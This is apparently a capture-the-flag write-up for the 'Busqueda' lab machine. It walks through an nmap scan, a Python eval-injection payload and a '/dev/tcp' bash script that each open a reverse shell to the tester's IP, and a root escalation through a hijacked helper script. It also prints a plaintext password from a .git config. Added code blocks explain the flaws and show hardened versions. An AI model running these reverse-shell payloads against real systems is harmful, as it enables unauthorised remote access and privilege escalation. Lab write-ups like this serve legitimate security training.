Busqueda machine
n3ym4r

nmap scan

┌──(n3ym4r㉿kali)-[~]
└─$ nmap 10.10.11.208
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 15:41 CST
Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 99.99% done; ETC: 15:43 (0:00:00 remaining)
Nmap scan report for 10.10.11.208
Host is up (0.90s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 118.88 seconds
┌──(n3ym4r㉿kali)-[~]
└─$ sudo nmap 10.10.11.208 -sC -sV -O -p22,80
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 15:53 CST
Nmap scan report for 10.10.11.208
Host is up (0.82s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.6 (93%), Linux 5.4 (93%), Android 4.1.1 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.40 seconds

Ports 22 and 80 are open. Add searcher.htb to /etc/hosts and visit the web site.

Web vulnerability discovery


The page footer shows that the site is powered by Searchor:

https://github.com/ArjunSharda/Searchor

It searches for information using a chosen search engine, so we may be able to make it redirect to our IP.

Capture the request in Burp:

POST /search HTTP/1.1
Host: searcher.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://searcher.htb
Connection: close
Referer: http://searcher.htb/
Upgrade-Insecure-Requests: 1

engine=Youtube&query=1111

There are two parameters, so we can try placing our payload in one of them.

Exploitation

Start a local listener:

┌──(n3ym4r㉿kali)-[~]
└─$ nc -nvlp 4444               
listening on [any] 4444 ...

Modify the request in Burp:

POST /search HTTP/1.1
Host: searcher.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 311
Origin: http://searcher.htb
Connection: close
Referer: http://searcher.htb/
Upgrade-Insecure-Requests: 1

engine=BBC&query=ddd'%2beval(compile('for%20x%20in%20range(1)%3a%5cn%20import%20time%5cn%20import%20socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.7",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'%2c'a'%2c'single'))%2b'

The reverse shell connects back:

┌──(n3ym4r㉿kali)-[~]
└─$ sudo nc -nvlp 4444 
[sudo] n3ym4r 的密码:
listening on [any] 4444 ...



connect to [10.10.16.7] from (UNKNOWN) [10.10.11.208] 57632
/bin/sh: 0: can't access tty; job control turned off
$ $ $ $ 
$ $ $ $ python3 -c 'import pty; pty.spawn("/bin/bash")'
svc@busqueda:/var/www/app$ whoami
whoami
svc
svc@busqueda:/var/www/app$ cd
cd
svc@busqueda:~$ ls
ls
snap  user.txt
svc@busqueda:~$ cat user.txt
cat user.txt
096886c4a46a05675658f26bbaef429f
svc@busqueda:~$ 

python3 -c 'import pty; pty.spawn("/bin/bash")' upgrades the shell to an interactive one, and we find the user flag.

Privilege escalation

Look around for information:
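The injection works because Searchor builds a Python expression from the engine name and the query string and hands it to eval, so a single quote in the query closes the string literal and the remainder runs as code on the server. The block below is an added example, not Searchor's or the box's code: a simplified reconstruction of that pattern beside a hardened version that never turns input into source. The ENGINES table is an assumption standing in for the real engine list.

```python
from urllib.parse import quote_plus

# Constructed lookup table standing in for Searchor's engine enum (assumption).
ENGINES = {
    "Youtube": "https://www.youtube.com/results?search_query=",
    "BBC": "https://www.bbc.co.uk/search?q=",
    "Google": "https://www.google.com/search?q=",
}


def search_unsafe(engine: str, query: str) -> str:
    """Vulnerable pattern: user input is pasted into Python source and eval'd.

    A query containing a single quote ends the literal early, and whatever
    follows runs as Python with the web application's privileges.
    """
    expr = f"ENGINES['{engine}'] + '{query}'"
    return eval(expr)  # deliberately unsafe, kept only to show the pattern


def search_safe(engine: str, query: str) -> str:
    """Hardened form: no code is built from input.

    The engine name is an allow-listed dictionary key and the query is
    percent-encoded data, so quotes and operators are inert.
    """
    try:
        base = ENGINES[engine]
    except KeyError:
        raise ValueError(f"unknown engine: {engine!r}") from None
    return base + quote_plus(query)
```

With the unsafe version a query such as `x'+str(6*7)+'` yields a URL ending in `x42`, proving that the expression was evaluated; the safe version encodes the same input as literal text.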

svc@busqueda:/var/www/app$ ls -al
ls -al
total 20
drwxr-xr-x 4 www-data www-data 4096 Apr  3 14:32 .
drwxr-xr-x 4 root     root     4096 Apr  4 16:02 ..
-rw-r--r-- 1 www-data www-data 1124 Dec  1 14:22 app.py
drwxr-xr-x 8 www-data www-data 4096 Apr 15 03:25 .git
drwxr-xr-x 2 www-data www-data 4096 Dec  1 14:35 templates
svc@busqueda:/var/www/app$ cd .git
cd .git
svc@busqueda:/var/www/app/.git$ ls
ls
branches        config       HEAD   index  logs     refs
COMMIT_EDITMSG  description  hooks  info   objects
svc@busqueda:/var/www/app/.git$ cat config
cat config
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
[remote "origin"]
    url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
    remote = origin
    merge = refs/heads/main
svc@busqueda:/var/www/app/.git$

In www/app/.git/config there is a string that looks like a password. Let's try it.

sudo -l
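A plaintext password in a remote URL is a common leak in .git/config, and it is easy to check for. The block below is an added example, not from the writeup: it scans a git config for remote URLs that embed a password and reports them with the secret redacted. The config text is constructed in the shape of the one above, using the page's host and user with a placeholder password.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample in the shape of the box's .git/config; the password is a placeholder.
SAMPLE_GIT_CONFIG = """\
[core]
    repositoryformatversion = 0
    bare = false
[remote "origin"]
    url = http://cody:PLACEHOLDER-secret@gitea.searcher.htb/cody/Searcher_site.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
    remote = origin
"""

SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")
URL_RE = re.compile(r"^\s*url\s*=\s*(?P<url>\S+)\s*$")


def find_embedded_credentials(config_text: str) -> list:
    """Return one finding per remote whose URL carries user:password@host.

    Each finding names the section, the user and the password length, and
    gives the URL with the secret replaced by ***; the secret itself is never
    returned, so the output is safe to log.
    """
    findings = []
    section = None
    for line in config_text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            section = m["name"]
            continue
        m = URL_RE.match(line)
        if not m or section is None or not section.startswith("remote "):
            continue
        parts = urlsplit(m["url"])
        if not parts.password:
            continue
        host = parts.netloc.rsplit("@", 1)[1]   # keep port, drop user:pass
        redacted = urlunsplit(parts._replace(netloc=f"{parts.username}:***@{host}"))
        findings.append({"section": section, "user": parts.username,
                         "password_length": len(parts.password), "redacted_url": redacted})
    return findings
```

The remediation is to remove the credential from the URL (use a credential helper or a scoped token) and rotate the password, since anyone who can read the working tree could read it.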

svc@busqueda:/var/www/app/.git$ sudo -l
sudo -l
[sudo] password for svc: jh1usoih2bkjaspwe92

Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *
svc@busqueda:/var/www/app/.git$ 

The current user can run /opt/scripts/system-checkup.py with any arguments as root.

We cannot read the script, but running it prints some usage information:

svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup

Create a full-checkup.sh in /tmp:

cd /tmp
svc@busqueda:/tmp$ cat full-checkup.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.16.7/1234 0>&1
svc@busqueda:/tmp$ chmod +x full-checkup.sh
svc@busqueda:/tmp$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

Start another listener:

┌──(n3ym4r㉿kali)-[~]
└─$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.208] 45004
root@busqueda:/tmp# whoami
whoami
root
root@busqueda:/tmp# ls
ls
pee
poo
snap-private-tmp
systemd-private-6591c6e8ee094027a315ba6425f4dca2-apache2.service-SfEkK1
systemd-private-6591c6e8ee094027a315ba6425f4dca2-ModemManager.service-zSf6WS
systemd-private-6591c6e8ee094027a315ba6425f4dca2-systemd-logind.service-G8ik4Z
systemd-private-6591c6e8ee094027a315ba6425f4dca2-systemd-resolved.service-HSkC2C
systemd-private-6591c6e8ee094027a315ba6425f4dca2-systemd-timesyncd.service-xA7W3d
systemd-private-6591c6e8ee094027a315ba6425f4dca2-upower.service-fuvS6w
tmux-1000
vmware-root_841-4013329999
root@busqueda:/tmp# cd
cd
root@busqueda:~# ls
ls
ecosystem.config.js
root.txt
scripts
snap
root@busqueda:~# cat root.txt
cat root.txt
6df616616ffeb8d7982621ba4603295d
root@busqueda:~# 

We now have a root shell and the root flag.
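The escalation works because the script runs its full-checkup helper by a relative name, so sudo executes whatever full-checkup.sh sits in the caller's working directory. The block below is an added example, not the real system-checkup.py (which could not be read): an assumed version of the weak call beside a hardened one that uses an absolute path under /opt/scripts and refuses a helper, or a containing directory, that root does not own or that other users can write to.

```python
import os
import stat
import subprocess

SCRIPT_DIR = "/opt/scripts"  # directory named in the sudo rule
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def run_full_checkup_unsafe() -> subprocess.CompletedProcess:
    """Assumed vulnerable pattern: a relative path means the helper is looked
    up in the caller's cwd, which sudo does not change, so /tmp/full-checkup.sh
    runs as root when the command is launched from /tmp."""
    return subprocess.run(["./full-checkup.sh"], capture_output=True, text=True)


def helper_is_trusted(uid: int, mode: int, dir_uid: int, dir_mode: int) -> bool:
    """A helper is trusted only if root owns both the file and its directory
    and neither is writable by group or others (a sticky /tmp fails this)."""
    others_can_write = stat.S_IWGRP | stat.S_IWOTH
    return (uid == 0 and not mode & others_can_write
            and dir_uid == 0 and not dir_mode & others_can_write)


def run_full_checkup_safe(script_dir: str = SCRIPT_DIR) -> subprocess.CompletedProcess:
    """Hardened form: absolute path, ownership and permission check, and
    lstat so a symlink planted in the directory is refused as well."""
    path = os.path.join(script_dir, "full-checkup.sh")
    st = os.lstat(path)
    dst = os.lstat(script_dir)
    if stat.S_ISLNK(st.st_mode) or not helper_is_trusted(
            st.st_uid, st.st_mode, dst.st_uid, dst.st_mode):
        raise PermissionError(f"refusing to run untrusted helper {path}")
    # Run from a fixed cwd with a fixed PATH so nothing else from the caller's
    # environment influences the privileged child.
    return subprocess.run([path], capture_output=True, text=True, cwd="/",
                          env={"PATH": SAFE_PATH})
```

The ownership check is the part worth reusing: a root-owned, non-writable helper in a root-owned, non-writable directory cannot be swapped out by the unprivileged user who is allowed to trigger it.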